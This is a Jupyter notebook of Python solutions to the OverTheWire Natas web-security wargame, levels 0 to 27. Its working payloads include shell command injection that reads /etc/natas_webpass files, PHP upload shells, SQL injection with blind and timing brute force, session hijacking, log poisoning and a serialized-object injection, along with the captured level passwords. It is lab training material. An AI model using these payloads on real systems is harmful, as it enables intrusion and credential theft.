## natas.labs.overthewire.org

## utils

In [1]:
from IPython.display import HTML 

import binascii
import re
import time
from urllib.request import urlopen, Request
from urllib.request import HTTPHandler
from urllib.parse import quote, urlencode, quote, unquote

class Natas:
    """
    class for managing natas flags and providing url access methods
    hiding the basic auth for the current natas challenge
    """
    def __init__(self):
        self.natas_flags = {}
        
        self.level = -1
        self.currentFlag = ''            
    
    # set current level (and flag)
    def set_level(self, level, flag = None):
        """
        use authentication of the given level
        """
        if isinstance(level, str):
            level = int(level.replace('natas', ''))
        
        if not flag is None:
            # if flag is given check flag validity and store flag          
            try:
                self.readall(level = level, flag = flag)
                self.natas_flags[level] = flag
            except Exception as e:
                raise Exception('flag is invalid for level ' + str(level) + ': ' + flag)

                
        if not level in self.natas_flags:
            raise Exception('no flag stored for level ' + str(level))
        
        self.level = level
        self.currentFlag = self.natas_flags[self.level]
    
    def next_level(self, flag):
        """
        uses the flag to proceed to the next level
        validates and stores the flag
        """
        self.set_level(self.level+1, flag)

    def get_request(self, url = '', method = None, level = None, flag = None):
        """
        Creates a url request object which handles basic authentication for the current natas challenge. Url may be relative to the current natas challenge.
        """
        if level is None:
            level = self.level
        if flag is None:
            flag = self.currentFlag
        
        if not url.startswith('http'):
            url = 'http://natas' + str(level) + '.natas.labs.overthewire.org/' + url
        
        username = 'natas' + str(level)
        password = flag
        credentials = username + ':' + password
        auth_header = 'Basic ' + binascii.b2a_base64( credentials.encode() ).strip().decode()
        
        request = Request(url, method = method)
        request.add_header('Authorization', auth_header)
        
        return request

    def urlopen(self, url = '', level = None, flag = None):
        """
        Natas urlopen wrapper which handles basic authentication for the current natas challenge. Url may be relative to the current natas challenge.
        """
        if not isinstance(url, Request):
            url = self.get_request(url, level = level, flag = flag)
        
        return urlopen(url)
    
    def readall(self, url = '', level = None, flag = None):
        """
        read and return the string response of the given url / request object
        """
        return self.urlopen(url, level, flag).read().decode()
    
    def grep_flag(string):
        """
        finds and returns a list of potential natas flags in the given string
        """
        return re.findall('\w{32}', string)

natas = Natas()
    
class NatasLevel:
    """
    Function decorator which automatically does 
    
    natas.set_level(level)
    flag = f()
    natas.next_level(flag)
    
    for the given level on a function f
    
    example usage:
    
    @NatasLevel('natas42')
    def f():
        return 'next_flag'
    """
    def __init__(self, level, flag = None, natas = natas):
        self.natas = natas
        
        self.natas.set_level(level, flag)
    
    def decoratedFunc(self, *positional_args, **dict_args):
        if natas.level+1 in natas.natas_flags:
            # do not execute a challenge if the flag of the next level is known
            flag = natas.natas_flags[natas.level+1]
        else:
            flag = self.func(*positional_args, **dict_args)
        
        self.natas.next_level(flag)
        return flag
        
    def __call__(self, func):
        self.func = func
        return self.decoratedFunc

help(Natas)
help(NatasLevel)

Help on class Natas in module __main__:

class Natas(builtins.object)
 |  class for managing natas flags and providing url access methods
 |  hiding the basic auth for the current natas challenge
 |  
 |  Methods defined here:
 |  
 |  __init__(self)
 |      Initialize self.  See help(type(self)) for accurate signature.
 |  
 |  get_request(self, url='', method=None, level=None, flag=None)
 |      Creates a url request object which handles basic authentication for the current natas challenge. Url may be relative to the current natas challenge.
 |  
 |  grep_flag(string)
 |      finds and returns a list of potential natas flags in the given string
 |  
 |  next_level(self, flag)
 |      uses the flag to proceed to the next level
 |      validates and stores the flag
 |  
 |  readall(self, url='', level=None, flag=None)
 |      read and return the string response of the given url / request object
 |  
 |  set_level(self, level, flag=None)
 |      use authentication of the given level
 | 

In [2]:
# speedup jupyter notebook by not executing bruteforce based challenges again :)
natas.set_level('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh')
natas.set_level('natas17', '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw')
natas.set_level('natas18', 'xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP')
natas.set_level('natas19', '4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs')
natas.set_level('natas20', 'eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF')


## natas0
http://natas0.natas.labs.overthewire.org/

the flag is hidden in a omment in the html source 

In [3]:
@NatasLevel('natas0', 'natas0')
def natas0():
    reply = natas.readall()
    
    flag = Natas.grep_flag(reply)[-1]
    
    return flag
    
natas0()

'gtVrDuiDfck831PqWsLEZy5gyDz1clto'

## natas1
http://natas1.natas.labs.overthewire.org/

again ... but right clicking has been disabled per javascript

In [4]:
@NatasLevel('natas1')
def natas1():
    reply = natas.readall()
    
    flag = Natas.grep_flag(reply)[-1]
    
    return flag
    
natas1()

'ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi'

## natas2
http://natas2.natas.labs.overthewire.org/

- site has a *files/pixel.png* image on it
- directory *files/* is browsable
- there is a *files/users.txt*

In [5]:
@NatasLevel('natas2')
def natas2():
    file_dir = natas.urlopen('files/').read().decode()
    display(HTML(file_dir))
    
    reply = natas.urlopen('files/users.txt').read().decode()
    print('users.txt:\n' + reply)
    
    flag = Natas.grep_flag(reply)[-1]
    
    return flag

natas2()

users.txt:
# username:password
alice:BYNdCesZqW
bob:jw2ueICLvT
charlie:G5vCxkVV3m
natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
eve:zo4mJWyNj2
mallory:9urtcpzBmH



'sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14'

## natas3
http://natas3.natas.labs.overthewire.org/

- text in source code hints at there must be a robots.txt file
- robots.txt hints to */s3cr3t/* dir which is browsable
- reveals the existence of a *users.txt* file

In [6]:
@NatasLevel('natas3')
def natas3():
    robots_txt = natas.urlopen('robots.txt').read().decode()
    print('robots.txt:\n' + robots_txt)
    
    secret_dir = natas.urlopen('s3cr3t/').read().decode()
    display(HTML(secret_dir))
    
    reply = natas.urlopen('s3cr3t/users.txt').read().decode()
    print('users.txt:\n' + reply)
    
    flag = Natas.grep_flag(reply)[-1]
    
    return flag

natas3()

robots.txt:
User-agent: *
Disallow: /s3cr3t/



users.txt:
natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ



'Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ'

### natas4
http://natas4.natas.labs.overthewire.org/

allows access only from referrer *http://natas5.natas.labs.overthewire.org*

In [7]:
@NatasLevel('natas4')
def natas4():
    request = natas.get_request()
    request.add_header('Referer', 'http://natas5.natas.labs.overthewire.org/')
    reply = natas.readall(request)
    display(HTML(reply))
    
    flag = Natas.grep_flag(reply)[-1]
    
    return flag
    
natas4()

'iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq'

## natas 5
http://natas5.natas.labs.overthewire.org/

- site claims to be not logged
- sets a cookie *loggedin=0*

In [8]:
@NatasLevel('natas5')
def natas5():
    response = natas.urlopen()

    page = response.read().decode()
    display(HTML(page))
    print(response.getheaders())
    
    request = natas.get_request()
    request.add_header('Cookie', 'loggedin=1')
    reply = natas.readall(request)
    display(HTML(reply))
    
    flag = Natas.grep_flag(reply)[-1]
    
    return flag

natas5()

[('Date', 'Mon, 23 Sep 2019 18:16:06 GMT'), ('Server', 'Apache/2.4.10 (Debian)'), ('Set-Cookie', 'loggedin=0'), ('Vary', 'Accept-Encoding'), ('Content-Length', '855'), ('Connection', 'close'), ('Content-Type', 'text/html; charset=UTF-8')]


'aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1'

## natas 6
http://natas6.natas.labs.overthewire.org/

- site has a link to */index-source.html*
- */index-source.html* reveals that the index.php is doing
  ```php
  include "includes/secret.inc";
  ```
- the secret from the include file send to the form is revealing the flag


In [9]:
@NatasLevel('natas6')
def natas6():
    page = natas.readall('includes/secret.inc')
    print(page)
    
    secret = re.findall('\$secret = "(\w*)";', page)[0]
    
    request = natas.get_request(method = 'POST')
    request.data = urlencode({'secret': secret, 'submit': 'send'}).encode()
    
    reply = natas.readall(request)
    display(HTML(reply))
    
    flag = Natas.grep_flag(reply)[-1]
    return flag
    
natas6()

<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>



'7z3hEENjQtflzgnT29q7wAvMNfZdh0i9'

## natas7
http://natas7.natas.labs.overthewire.org/

- has links pointing to index.php?page=...
- has a hint in the source that the flag is located at /etc/natas_webpass/natas8
- index.php accepts any file path in the page parameter


In [10]:
@NatasLevel('natas7')
def natas7():    
    reply = natas.readall('index.php?page=/etc/natas_webpass/natas8')
    display(HTML(reply))
    
    flag = Natas.grep_flag(reply)[-1]
    
    return flag
    
natas7()

'DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe'

## natas8
http://natas8.natas.labs.overthewire.org/

- index-source.html shows how the secret is encoded
  ```php
    function encodeSecret($secret) {
        return bin2hex(strrev(base64_encode($secret)));
    }
  ```
- filling in the decoded secret and submitting the form gives us the flag

In [11]:
@NatasLevel('natas8')
def natas8():
    index_source = natas.readall('index-source.html')
    
    encoded_secret = re.findall('\$encodedSecret&nbsp;=&nbsp;"(\w*)";', index_source)[0]
    encoded_secret = binascii.unhexlify(encoded_secret)
    encoded_secret = encoded_secret[::-1]
    encoded_secret = binascii.a2b_base64(encoded_secret).decode()
   
    print('decoded secret: ' + encoded_secret)

    request = natas.get_request(method='POST')
    request.data = urlencode({'secret': encoded_secret, 'submit': 'send'}).encode()
    reply = natas.readall(request)
    
    display(HTML(reply))
    
    flag = Natas.grep_flag(reply)[-1]
    
    return flag

    
natas8()

decoded secret: oubWYf2kBq


'W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl'

## natas9
http://natas9.natas.labs.overthewire.org/

- passes form input to a shell command
  ```php
  if($key != "") {
      passthru("grep -i $key dictionary.txt");
  }
  ```
- making sure that *$key* is 
  ```bash
  `cat /etc/natas_webpass/natas10; echo " /etc/natas_webpass/natas10"`
  ```
  will execute
  ```bash
  grep whatevertheflagis /etc/natas_webpass/natas10 dictionary.txt
  ```
  on the shell
- this outputs all lines from */etc/natas_webpass/natas10* and *dictionary.txt* containing the flag

In [12]:
@NatasLevel('natas9')
def natas9():
    request = natas.get_request(method='POST')
    request.data = urlencode({'needle': '`cat /etc/natas_webpass/natas10; echo " /etc/natas_webpass/natas10"`', 'submit': 'send'}).encode()
    reply = natas.readall(request)
    
    display(HTML(reply))
    
    flag = Natas.grep_flag(reply)[-1]
    
    return flag

natas9()

'nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu'

## natas10
http://natas10.natas.labs.overthewire.org/

- same as natas 9 but this time ; and & are not allowed in the needle string
- bypassing the ; by simply using two subshells
  ```bash
  `cat /etc/natas_webpass/natas11``echo " /etc/natas_webpass/natas11"`
  ```

In [13]:
@NatasLevel('natas10')
def natas10():
    request = natas.get_request(method='POST')
    request.data = urlencode({'needle': '`cat /etc/natas_webpass/natas11``echo " /etc/natas_webpass/natas11"`', 'submit': 'send'}).encode()
    reply = natas.readall(request)
    
    display(HTML(reply))
    flag = Natas.grep_flag(reply)[-1]
    
    return flag

natas10()

'U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK'

 ## natas 11
 http://natas11.natas.labs.overthewire.org/
 
 - page sends an cookie with xor enrypted base64'ed and jsonified data which defaults to
   ```php
   $defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");
   ```
 - the enryption key can be gained by decrypting the cookie using the default json string as key
 - they gained key is repeating after 4 characters -> key length must have been 4
 - we can now use the key to create an own cookie which has *showpassword=yes* in the json string
   so that index.php prints the flag

In [14]:
@NatasLevel('natas11')
def natas11():
    def xor_encrypt(data, key):
        result = b''
        keylen = len(key)
    
        for i in range(len(data)):
            result += bytes( [data[i] ^ key[i % keylen]] )
        
        return result

    page = natas.urlopen()
    headers = page.getheaders()
    print(headers)
    
    cookie_data = page.getheader('Set-Cookie').replace('data=', '')
    cookie_data = unquote(cookie_data)
    cookie_data = binascii.a2b_base64(cookie_data)
    cookie_data = xor_encrypt(cookie_data, b'{"showpassword":"no","bgcolor":"#ffffff"}')
    print(cookie_data)
    
    key = cookie_data[:4]
    
    cookie_data = xor_encrypt(b'{"showpassword":"yes","bgcolor":"#abcdef"}', key)
    print(cookie_data)
    cookie_data = binascii.b2a_base64(cookie_data).strip()
    cookie_data = quote(cookie_data)
    
    request = natas.get_request()
    request.add_header('Cookie', 'data=' + cookie_data)
    reply = natas.readall(request)
    display(HTML(reply))
    flag = Natas.grep_flag(reply)[-1]
    
    return flag

natas11()

[('Date', 'Mon, 23 Sep 2019 18:16:07 GMT'), ('Server', 'Apache/2.4.10 (Debian)'), ('Set-Cookie', 'data=ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw%3D'), ('Vary', 'Accept-Encoding'), ('Content-Length', '1085'), ('Connection', 'close'), ('Content-Type', 'text/html; charset=UTF-8')]
b'qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq'
b'\nUK"\x1e\x00H+\x02\x04O%\x03\x13\x1apS\x0e]9S[\x1a(\x16\x14W&\x1e\x05\x1apSTY(\x12\x13],S\n'


'EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3'

## natas 12
http://natas12.natas.labs.overthewire.org/

- uploads the given file with a random filename but the same extension into the *upload/* path
- an uploaded php file will be executed as php script
- so were uploading a simple php file reading and outputting the */etc/natas_webpass/natas13* file which contains the flag

In [15]:
@NatasLevel('natas12')
def natas12():
    php_file = b'<?\nreadfile("/etc/natas_webpass/natas13");\n?>'
    data = b'--myBoundary\nContent-Disposition: form-data; name="MAX_FILE_SIZE"\n\n1000\n'
    data += b'--myBoundary\nContent-Disposition: form-data; name="filename"\n\npayload.php\n'
    data += b'--myBoundary\nContent-Disposition: form-data; name="uploadedfile"; filename="payload.php"\nContent-Type: application/octet-stream\n\n'
    data += php_file + b'\n\n'
    data += b'--myBoundary--\n'
    
    request = natas.get_request(method='POST')
    request.add_header('Content-Type', 'multipart/form-data; boundary=myBoundary')
    request.data = data
    page = natas.readall(request)
    
    url = re.findall('upload/\w*\.php', page)[0]
    reply = natas.readall(url)
    flag = Natas.grep_flag(reply)[-1]
    
    return flag
    
natas12()

'jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY'

## natas 13
http://natas13.natas.labs.overthewire.org/

- same as natas12 but this time the uploaded file needs to have a JFIF header (see https://de.wikipedia.org/wiki/JPEG_File_Interchange_Format)

In [16]:
@NatasLevel('natas13')
def natas13():
    jfif_header = bytes([ 0xff, 0xd8, 0xff, 0xe0 ])
    php_file = jfif_header + b'<?\nreadfile("/etc/natas_webpass/natas14");\n?>'
    data = b'--myBoundary\nContent-Disposition: form-data; name="MAX_FILE_SIZE"\n\n1000\n'
    data += b'--myBoundary\nContent-Disposition: form-data; name="filename"\n\npayload.php\n'
    data += b'--myBoundary\nContent-Disposition: form-data; name="uploadedfile"; filename="payload.php"\nContent-Type: application/octet-stream\n\n'
    data += php_file + b'\n\n'
    data += b'--myBoundary--\n'
    
    request = natas.get_request(method='POST')
    request.add_header('Content-Type', 'multipart/form-data; boundary=myBoundary')
    request.data = data
    page = natas.readall(request)
        
    url = re.findall('upload/\w*\.php', page)[0]
    reply = natas.urlopen(url).read()[len(jfif_header):].decode()
    flag = Natas.grep_flag(reply)[-1]
    
    return flag
    
natas13()

'Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1'

## natas 14
http://natas14.natas.labs.overthewire.org/

- sql injection

In [17]:
@NatasLevel('natas14')
def natas14():
    request = natas.get_request(method='POST')
    data = {"username": "username", "password": "\" or 1=1 or \"", "submit": "send"};
    request.data = urlencode(data).encode()
    
    reply = natas.readall(request)
    display(HTML(reply))
    
    flag = Natas.grep_flag(reply)[-1]
    return flag

natas14()

'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'

## natas 15
http://natas15.natas.labs.overthewire.org/

- sql injection possible but we need to gain the contents of the password database column
- do a simple bruteforce using case sensitive LIKE BINARY and % 

In [18]:
@NatasLevel('natas15')
def natas15():
    chars = '0aA1bB2cC3dD4eE5fF6Gg7hH8iI9jJkKlLmMnNoOpPqQrRsStTuUvVwWxXyYzZ'
    
    username = 'natas16" and password LIKE BINARY "'
    flag = ''
    for i in range(32):
        for next_character in chars:
            data = {'username': username + flag + next_character + '%', 'submit': 'Check existence'}
            request = natas.get_request(method='POST')
            request.data = urlencode(data).encode()
            reply = natas.readall(request)
            if 'This user exists.' in reply:
                flag += next_character
                print(flag + " ...")
                break
    
    return flag

natas15()

'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh'

## natas 16
http://natas16.natas.labs.overthewire.org/

- if _\$( ... )_ is returning a string then only parts of _dictionary.txt_ will be printed
- idea: make _\$( ... )_ return something, if ^pattern is found in _/etc/natas_webpass/natas17_
- use pattern to make a brute force attack on the next unknown character of the flag
- i.e. _\$( grep ^d /etc/natas_webpass/natas17 )_ is not empty if the flag begins with character d
  -> "African" will not be part of the results

In [19]:
@NatasLevel('natas16')
def natas16():
    chars = '0aA1bB2cC3dD4eE5fF6Gg7hH8iI9jJkKlLmMnNoOpPqQrRsStTuUvVwWxXyYzZ'
    
    flag = ''
    for i in range(32):
        for next_character in chars:
            data = {'needle': '$( grep ^' + flag + next_character + ' /etc/natas_webpass/natas17 )', 'submit': 'Search'}
            request = natas.get_request(method='POST')
            request.data = urlencode(data).encode()

            reply = natas.readall(request)
            if not '<pre>\n\nAfrican' in reply:
                flag += next_character
                print(flag + " ...")
                break
    
    return flag

natas16()

'8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw'

## natas 17
http://natas17.natas.labs.overthewire.org/

- same as natas 15 but we need to use timing

In [20]:
@NatasLevel('natas17')
def natas17():
    chars = '0aA1bB2cC3dD4eE5fF6Gg7hH8iI9jJkKlLmMnNoOpPqQrRsStTuUvVwWxXyYzZ'
    
    flag = ''
    for i in range(32):
        for next_character in chars:
            data = {'username': 'natas18" AND password LIKE BINARY "' + flag + next_character + '%" AND SLEEP(2) AND ""="', 'submit': 'Check existence'}
            request = natas.get_request(method='POST')
            request.data = urlencode(data).encode()

            begin = time.perf_counter()
            reply = natas.readall(request)
            end = time.perf_counter()
            
            if end-begin > 1.5:
                flag += next_character
                print(flag + " ...")
                break
    
    return flag

natas17()

'xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP'

## natas 18
http://natas18.natas.labs.overthewire.org/

- guess numeric session id between 0 and 640

In [21]:
@NatasLevel('natas18')
def natas18():
    for i in range(640):
        request = natas.get_request()
        request.add_header('Cookie', 'PHPSESSID=' + str(i))
        reply = natas.readall(request)
        
        if 'credentials for the next level are' in reply:
            break
            
    display(HTML(reply))
    
    flag = Natas.grep_flag(reply)[-1]
    return flag

natas18()

'4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs'

## natas 19
http://natas19.natas.labs.overthewire.org/

- session id is now 'n-username' as hex - for n between 0 and 640

In [22]:
@NatasLevel('natas19')
def natas19():
    for i in range(640):
        request = natas.get_request()
        sessid = str(i) + '-admin'
        request.add_header('Cookie', 'PHPSESSID=' + binascii.hexlify(sessid.encode()).decode())
        reply = natas.readall(request)
        
        if 'credentials for the next level are' in reply:
            break
            
    display(HTML(reply))
    
    flag = Natas.grep_flag(reply)[-1]
    return flag

natas19()

'eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF'

## natas 20
http://natas20.natas.labs.overthewire.org/

- session data is written to file as\
  key1 value1\
  key2 value2\
  \
  i.e.\
  name admin\
  admin 1
- but line breaks in session values are not escaped prior writing - so we can set the admin flag ourselves and reread the session

In [23]:
@NatasLevel('natas20')
def natas20():
    request = natas.get_request(method='POST')
    request.data = urlencode({'name': 'anyuser\nadmin 1', 'submit': 'Change name'}).encode()
    response = natas.urlopen(request)
    cookie = response.getheader('Set-Cookie').split(';')[0]
    reply = response.read().decode()
    
    print('Session-Cookie: ' + cookie)
    
    request = natas.get_request()
    request.add_header('Cookie', cookie)
    reply = natas.readall(request)

    display(HTML(reply))
    
    flag = Natas.grep_flag(reply)[-1]
    return flag
    
natas20()

Session-Cookie: PHPSESSID=vbjsnj9vee5tutgr0uipbv7kj2


'IFekPyrQXftziDEsUr3x21sYuahypdgJ'

## natas 21
http://natas21.natas.labs.overthewire.org/

- site is crosshosted on different subdomains - but the php instance remains the same\
  -> sessions existing on one subdomain will be the same on the other one
- cross hosted site stores every variable in the shared php session
- idea: set admin=1 flag in the session of the cross hosted domain\
  -> load the same session on the original site\
  -> gather the flag

In [24]:
@NatasLevel('natas21')
def natas21():
    request = natas.get_request(url='http://natas21-experimenter.natas.labs.overthewire.org/index.php', method='POST')
    request.data = urlencode({'admin': 1, 'submit': 'Update'}).encode()
    response = natas.urlopen(request)
    cookie = response.getheader('Set-Cookie').split(';')[0]
    
    request = natas.get_request()
    request.add_header('Cookie', cookie)
    reply = natas.readall(request)
    
    flag = Natas.grep_flag(reply)[-1]
    return flag
    
natas21()

'chG9fbe1Tq2eWVMgjYYD1MsfIvN461kJ'

## natas 22
http://natas22.natas.labs.overthewire.org/

- flag is returned by the server if GET parameter _revelio_ is present
- but server also tells the browser to relocate to / url - so the flag will not be visible to the user

In [25]:
@NatasLevel('natas22')
def natas22():
    request = natas.get_request('?revelio')
    
    # use HTTPHandler() directly because urlopen() would immediately follow the Location: header
    request.timeout = 60
    reply = HTTPHandler().http_open(request).read().decode()
    
    flag = Natas.grep_flag(reply)[-1]
    return flag

natas22()

'D0vlad33nQF0Hz2EP255TP5wSW9ZsRSE'

## natas 23
http://natas23.natas.labs.overthewire.org/

- we need to fulfill _strstr(\\$_REQUEST["passwd"],"iloveyou") && (\\$_REQUEST["passwd"] > 10 )_

In [26]:
@NatasLevel('natas23')
def natas23():
    reply = natas.readall('?passwd=11iloveyou')
    
    display(HTML(reply))
    
    flag = Natas.grep_flag(reply)[-1]
    return flag
    
natas23()

'OsRmXFguozKpTZZ5X14zNO43379LZveg'

## natas 24
http://natas24.natas.labs.overthewire.org/

- strcmp($array[], 'anything') = NULL + warning
- idea: send passwd[] variable instead of passwd

In [27]:
@NatasLevel('natas24')
def natas24():
    reply = natas.readall('?passwd[]')
    
    display(HTML(reply))
    
    flag = Natas.grep_flag(reply)[-1]
    return flag

natas24()

'GHF6X7YwACaYYssHVY05cFq83hRktl4c'

## natas 25
http://natas25.natas.labs.overthewire.org/

- page makes an include depending on a request variable: _languages/$lang_
- include is secured with _str\_replace("../", "")_ and also prevents inclusion of paths containing _natas\_webpass_
- logs useragent into /var/www/natas/natas25/logs/natas25_SESSIONID.log
- idea: use _str\_replace("..././", "")_ = "../" to include the log file
- inject php code into the log file

In [28]:
@NatasLevel('natas25')
def natas25():
    response = natas.urlopen()
    cookie = response.getheader('Set-Cookie').split(';')[0]
    sessionid = cookie.replace('PHPSESSID=', '')
    
    print(sessionid)
    
    request = natas.get_request('?lang=..././logs/natas25_' + sessionid + '.log')
    request.add_header('Cookie', cookie)
    request.add_header('User-Agent', '<?php readfile("/etc/natas_webpass/natas26") ?>')
    reply = natas.readall(request)
    
    display(HTML(reply))
    
    flag = Natas.grep_flag(reply)[-1]
    return flag

natas25()

rptbie4lta1bf434rssdff1p60


'oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T'

## natas 26
http://natas26.natas.labs.overthewire.org/

- the page contains an unused _Logger_ class
- uses _unserialize_ to extract image data from the cookie
- idea: construct a logger with a special _$exitMsg_ into the cookie and serialize it:

```php
<?php

class Logger {
        private $logFile;
        private $initMsg;
        private $exitMsg;

        function __construct() {
                $this->logFile = "img/natas26.php";
                $this->exitMsg = "<?php readfile('/etc/natas_webpass/natas27'); ?>";
        }
}

$logger = new Logger();
print(urlencode(base64_encode(serialize($logger))));

?>```
- serialized form:
```
Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czoxNToiaW1nL25hdGFzMjYucGhwIjtzOjE1OiIATG9nZ2VyAGluaXRNc2ciO047czoxNToiAExvZ2dlcgBleGl0TXNnIjtzOjQ4OiI8P3BocCByZWFkZmlsZSgnL2V0Yy9uYXRhc193ZWJwYXNzL25hdGFzMjcnKTsgPz4iO30%3D```

In [29]:
@NatasLevel('natas26')
def natas26():
    response = natas.urlopen()
    session_cookie = response.getheader('Set-Cookie').split(';')[0]
    session_id = session_cookie.replace('PHPSESSID=', '')
    
    print(session_cookie)
    
    serialized_logger = 'Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czoxNToiaW1nL25hdGFzMjYucGhwIjtzOjE1OiIATG9nZ2VyAGluaXRNc2ciO047czoxNToiAExvZ2dlcgBleGl0TXNnIjtzOjQ4OiI8P3BocCByZWFkZmlsZSgnL2V0Yy9uYXRhc193ZWJwYXNzL25hdGFzMjcnKTsgPz4iO30%3D'
    cookie = "drawing=" + serialized_logger
    
    print(serialized_logger)
    print(cookie)
    
    request = natas.get_request()
    request.add_header('Cookie', session_cookie + '; ' + cookie)
    natas.readall(request)
    
    reply = natas.readall('img/natas26.php')
    
    flag = Natas.grep_flag(reply)[-1]
    return flag

natas26()

PHPSESSID=oj2ln5v11vrvk066km71njomh6
Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czoxNToiaW1nL25hdGFzMjYucGhwIjtzOjE1OiIATG9nZ2VyAGluaXRNc2ciO047czoxNToiAExvZ2dlcgBleGl0TXNnIjtzOjQ4OiI8P3BocCByZWFkZmlsZSgnL2V0Yy9uYXRhc193ZWJwYXNzL25hdGFzMjcnKTsgPz4iO30%3D
drawing=Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czoxNToiaW1nL25hdGFzMjYucGhwIjtzOjE1OiIATG9nZ2VyAGluaXRNc2ciO047czoxNToiAExvZ2dlcgBleGl0TXNnIjtzOjQ4OiI8P3BocCByZWFkZmlsZSgnL2V0Yy9uYXRhc193ZWJwYXNzL25hdGFzMjcnKTsgPz4iO30%3D


'55TBjpPZUUJgVP5b3BnbG6ON9uDPVzCJ'

## natas 27
http://natas27.natas.labs.overthewire.org/

- SQL table uses varchar(64) instead of nvarchar(64) type \
-> 'natas28' and 'natas28[fill up with spaces until 64 chars]1' cannot be distringuished in SELECT statements
- login as 'natas28[57 white spaces]' to create user with empty password
- login again as 'natas28' and gain flag

In [30]:
@NatasLevel('natas27')
def natas27():
    username = 'natas28'
    username += ' ' * (64 - len(username)) + '1'

    # login as 'natas28                                                         1'
    # to create new user with empty password
    request = natas.get_request(method='POST')
    request.data = urlencode({'username': username, 'password': '', 'submit': 'login'}).encode()
    natas.urlopen(request)
    
    # login as 'natas28' to gain flag
    request = natas.get_request(method='POST')
    request.data = urlencode({'username': 'natas28', 'password': '', 'submit': 'login'}).encode()
    reply = natas.readall(request)

    flag = Natas.grep_flag(reply)[-1]
    return flag

natas27()

'JWwR438wkgTsNKBbcJoowyysdM82YjeF'